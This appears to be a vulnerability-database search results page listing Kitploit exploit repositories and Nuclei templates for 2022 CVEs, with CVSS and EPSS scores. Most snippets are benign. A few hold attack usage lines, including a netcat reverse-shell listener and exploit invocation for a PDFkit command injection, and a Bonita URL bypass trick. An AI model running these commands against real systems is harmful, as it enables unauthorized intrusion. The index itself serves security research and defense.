Lucene search
+L

110983 matches found

Kitploit
Kitploit
added 2026/09/03 11:27 p.m.3 views

Follina-Remediation

Follina-Remediation Removes the ability for MSDT to run, in response to CVE-2022-30190 Follina This repo has been archived since Microsoft published official fixes. Seehttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190 for specifics...

9.3CVSS7.7AI score0.99234EPSS
SaveExploits63
Kitploit
Kitploit
added 2026/09/03 9:59 p.m.7 views

CVE-2022-31626-CVE-2024-2961-CVE-2019-6977

CVE-2022-31626, CVE-2024-2961, CVE-2019-6977 Faire un don Soutenez la maintenance de ce projet via PayPal ou en scannant le code QR ci-dessous. ⚡ Utilisation simple Utilisez ce projet uniquement dans des environnements sûrs et autorisés, tels que : Machines virtuelles locales Conteneurs Docker...

8.8CVSS7.4AI score0.8833EPSS
SaveExploits26
Kitploit
Kitploit
added 2026/09/03 8:11 p.m.3 views

bigip-scanner

BIG-IP Scanner Détermine la version logicielle exécutée par une interface de gestion F5 BIG-IP distante. Développé avec ❤️ par l'équipe Bishop Fox Cosmos. Description CVE-2022-1388, une vulnérabilité critique dans l'interface de gestion F5 BIG-IP, permet à un attaquant de contourner...

9.8CVSS9.1AI score0.99958EPSS
SaveExploits63References3
Kitploit
Kitploit
added 2026/09/03 7:39 p.m.3 views

bhyve

bhyve كود استغلال لـ CVE-2022-23087...

8.8CVSS5.2AI score0.00209EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/09/03 7:20 p.m.3 views

ALLMediaServer-1.6-Buffer-Overflow

CVE-2022-28381 ALLMediaServer 1.6 원격 - 버퍼 오버플로우 SEH ALLMediaServer-1.6-버퍼-오버플로우Metasploit 증명 및 익스플로잇 참고 자료 https://nvd.nist.gov/vuln/detail/CVE-2022-28381 https://vulners.com/cve/CVE-2022-28381 https://vulners.com/cve/CVE-2022-28381...

10CVSS8.8AI score0.70405EPSS
SaveExploits4
Kitploit
Kitploit
added 2026/09/03 12:28 p.m.3 views

Sandbox-Challenge-Spring4Shell-CVE-2022-22965-

Spring4Shell Threat Sandbox CVE-2022-22965 Overview This walkthrough documents the completion of the Sandbox Challenge focused on CVE-2022-22965, commonly known as Spring4Shell — a critical CVSS 9.8/10 remote code execution vulnerability affecting specific versions of the Spring Java framework. T...

9.8CVSS7.6AI score0.99638EPSS
SaveExploits105
Kitploit
Kitploit
added 2026/09/03 11:03 a.m.3 views

CS4239-Spring4Shell-POC

CS4239-Spring4Shell-POC Proof of concept for CVE-2022-22965 Spring4Shell for CS4239 G410 report. Adapted from this PoC to demonstrate unpatched & patched behavior. Running the demo There are 2 example programs dockerized in this repository with identical source code. One uses a vulnerable version...

9.8CVSS7.5AI score0.99638EPSS
SaveExploits105References1
Kitploit
Kitploit
added 2026/09/03 9:56 a.m.2 views

CVE-2022-22963

This repository does not have a README...

9.8CVSS7.5AI score0.99938EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/03 9:54 a.m.5 views

CVE-2022-1592

CVE-2022-1592 POC root@kitploit: pip install requests --break-system-packages root@kitploit: CVE-2022-1592.py https://tatget.com/...

9.4CVSS7.2AI score0.01168EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/03 8:55 a.m.3 views

apache__jspwiki_CVE-2022-46907_2-11-3

Apache JSPWiki 2.11 - Documentation root@kitploit: Licensed to the Apache Software Foundation ASF under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the...

6.1CVSS6.2AI score0.01162EPSS
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/03 8:45 a.m.3 views

nahsra__antisamy_CVE-2022-29577_1-6-6-1

AntiSamy A library for performing fast, configurable cleansing of HTML coming from untrusted sources. Supports Java 7+. Another way of saying that could be: It's an API that helps you make sure that clients don't supply malicious cargo code in the HTML they supply for their profile, comments, etc...

6.1CVSS6.3AI score0.01313EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/09/03 8:42 a.m.3 views

ff4j__ff4j_CVE-2022-44262_1_8_13_fixed

✨✨✨ FF4J - Feature Flipping for Java ✨✨✨ Codacy Badge FF4j, is an implementation of the Feature Toggle pattern. 🤘Features Feature Toggle: Enable. and disable features at runtime - no deployments. In your code implement multiple paths protected by dynamic predicates if/then/else. Role-based...

9.8CVSS8.7AI score0.0148EPSS
SaveExploits1References4
Kitploit
Kitploit
added 2026/09/03 8:40 a.m.4 views

CVE-2022-25765

CVE-2022-25765 Exploit A small POC exploit for CVE-2022-25765, PDFkit-CMD-Injection Usage 1. Start a netcat listener on your attack machine: root@kitploit: nc -lvnp 4444 2. Run the exploit: root@kitploit: python cve-2022-25765.py -t http://TARGETIP:PORT -l YOURIP -p YOURPORT Example: root@kitploi...

9.8CVSS8.6AI score0.39804EPSS
SaveExploits12
Kitploit
Kitploit
added 2026/09/03 8:33 a.m.3 views

jenkinsci__workflow-cps-plugin_CVE-2022-25173_2646-v6ed3b5b01ff1

Pipeline: Groovy Plugin Introduction A key component of the Pipeline plugin suite, this provides the standard execution engine for Pipeline steps, based on a custom Groovy interpreter that runs inside the Jenkins controller process. In principle other execution engines could be supported, with...

8.8CVSS8.1AI score0.01444EPSS
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/03 8:22 a.m.7 views

keycloak__keycloak_CVE-2022-4137_20-0-3

Keycloak Keycloak is an Open Source Identity and Access Management solution for modern Applications and Services. This repository contains the source code for the Keycloak Server, Java adapters and the JavaScript adapter. Help and Documentation Documentation User Mailing List - Mailing list for...

8.1CVSS6.7AI score0.01149EPSS
SaveExploits0References11
Kitploit
Kitploit
added 2026/09/03 8:04 a.m.3 views

keycloak__keycloak_CVE-2022-4361_21-1-1

Keycloak Keycloak is an Open Source Identity and Access Management solution for modern Applications and Services. This repository contains the source code for the Keycloak Server, Java adapters and the JavaScript adapter. Help and Documentation Documentation User Mailing List - Mailing list for...

10CVSS7AI score0.00626EPSS
SaveExploits0References9
Nuclei
Nuclei
added 2026/09/03 2:10 a.m.28 views

Bonita Web 2021.2 - Authentication/Authorization Bypass

Bonita Web 2021.2 contains an authentication/authorization bypass vulnerability caused by an overly broad exclude pattern in RestAPIAuthorizationFilter, allowing unauthenticated users to access privileged API endpoints by appending ;i18ntranslation or /../i18ntranslation/ to the URL. id:...

9.8CVSS7.3AI score0.56724EPSS
SaveExploits1References3
Nuclei
Nuclei
added 2026/09/03 2:10 a.m.52 views

Wavlink WN535K2/WN535K3 - OS Command Injection

Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised...

9.8CVSS7.3AI score0.29763EPSS
SaveExploits1References5
Nuclei
Nuclei
added 2026/09/03 2:10 a.m.67 views

WordPress Elementor Website Builder <= 3.5.5 - DOM Cross-Site Scripting

WordPress Elementor Website Builder plugin 3.5.5 and prior contains a reflected cross-site scripting vulnerability via the document object model. id: CVE-2022-29455 info: name: WordPress Elementor Website Builder = 3.5.5 - DOM Cross-Site Scripting author: rotembar,daffainfo severity: medium...

6.1CVSS6.3AI score0.23678EPSS
SaveExploits7References5
Nuclei
Nuclei
added 2026/09/03 2:10 a.m.63 views

Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation

Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user. id: CVE-2022-25369 info: name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation author: pdteam severity: critical description: Dynamicweb contains a vulnerability which...

9.8CVSS5.9AI score0.40739EPSS
SaveExploits0References2
Rows per page
Query Builder